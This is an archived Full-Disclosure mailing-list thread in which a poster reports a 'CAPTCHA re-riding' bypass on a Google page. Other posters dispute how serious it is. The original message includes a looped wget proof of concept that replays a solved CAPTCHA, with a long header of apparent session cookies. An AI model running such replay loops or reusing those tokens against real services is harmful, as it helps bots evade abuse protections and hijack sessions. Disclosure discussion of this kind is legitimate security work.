lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 28 Aug 2013 18:42:17 +0200
From: Alex <>
Subject: Re: CAPTCHA re-riding attack in

I don't see a captcha bypass, all I see is a wget command with Cookie
and Session ID and such. 

while true; do echo "Yes, I am blind!"; done 

Am 2013-08-26 18:04, schrieb kevin philips: 

> Hi Adam, 
> As discussed, this issue just a captcha bypass problem. Except this case, I don't know google still uses this captcha somewhere or not :). Anyway, thank you Adam! Your reply is a very clear way to explain it. 
> See more: 
> [1]
> Cheers, 
> ~g4mm4 
> On Mon, Aug 26, 2013 at 10:34 PM, adam <> wrote:
> What exactly is a re-riding attack? Is that just another name for replay? And does this only work in the sorry/continue context for [2]? If so, I don't think it's really that big of a deal either. Repeated requests, typically, are the cause of the sorry/continue page, so I can't see how _more_ repeated requests will somehow solve that. To be clear: sure, I get that for the time being - you're able to circumvent the captcha - if I'm understanding correctly. However, in this case, that captcha is only a courtesy anyway. It's the middle ground between normal user and infected machine/bot, where they give you a little extra leniency before totally banning you anyway. If I'm misunderstanding, or if it applies on a wider scale than that, please let me know. 
> On Mon, Aug 26, 2013 at 12:07 AM, kevin philips <> wrote: 
> folks,
> I found CAPTCHA re-riding attack issue in [3].
> PoC:
> Loop request with correct captcha (in this case the value of captcha is coppro):
> while true; do wget --header="Cookie: PREF=ID=44ba1c9fba493ea4:U=e326f1400e3cc5b1:LD=vi:TM=1343010889:LM=1361717433:S=2dw8AygnrF9_TW_I; NID=67=mwocoU0FoMG_dewxiEO3zDc7LLQtKVabiaezQsipcVb-020jysQ9qfngMTyIYNGsub8G7eQBqQPuTXUAO3GJVFZZWjF4tawOwj0KGaRTbw27z0ZEuZtSN-98hX1KedvpY_rzoHyd-InVhDtoG9dqONDS88RmP8JxgZAz7GhtH_QWpTk1WUIY4WTMb6AQ5f58oYUlgQ; SID=DQAAAMEAAAAeueuQrtMIKY0NaJovAs1RyF3U1GgJWaoy5UBsCcZV3i2BF5jflSj7nG8YhPQoAe5kwE0eBjJzqeEafDuSTuTaTAGECW0rv2Fw1SQ8NHRzf9m4ymwerpALiHDeHUUlOlWmbrhXzjVm_RMkfvqohuwmHHAHPJKi-8MyKQbjiQd5lGEIH0JArQ8lUEuuqRRVUjBsTXis1TPqQWwHcHY5Chtm2ZOhZxoy2Xj59q8s_eC-Gj5YJ70jisfQrIWjhbjWeB3HvFVXinAWUVdvA6_5VbJ1; HSID=ACvpz7M2xPdk68Q6x; APISID=C9DV1u24Umr1AfnD/AfEqGieNRVPzU6fur; GDSESS=ID=cba44dffe2e20f09:TM=1374658124:C=c:IP="
" [4]" -qd; done
> Abuse this bug, malware, automation scanner, zombie computers, SEO bot can bypass the google captcha with the correct initiation captcha for malicious actions. 
> References:
> _ [5]
> _ [6] 
> Updated: Sadly, Google Security Team considers "captcha re-riding attack" in this case is not critical bug. Well, I decide to post to Full Disclosure for more discussions.
> ~g4mm4 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: [7]
> Hosted and sponsored by Secunia - [8]


Full-Disclosure - We believe in it.
Charter: [7]
Hosted and sponsored by Secunia - [8]


Content of type "text/html" skipped

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists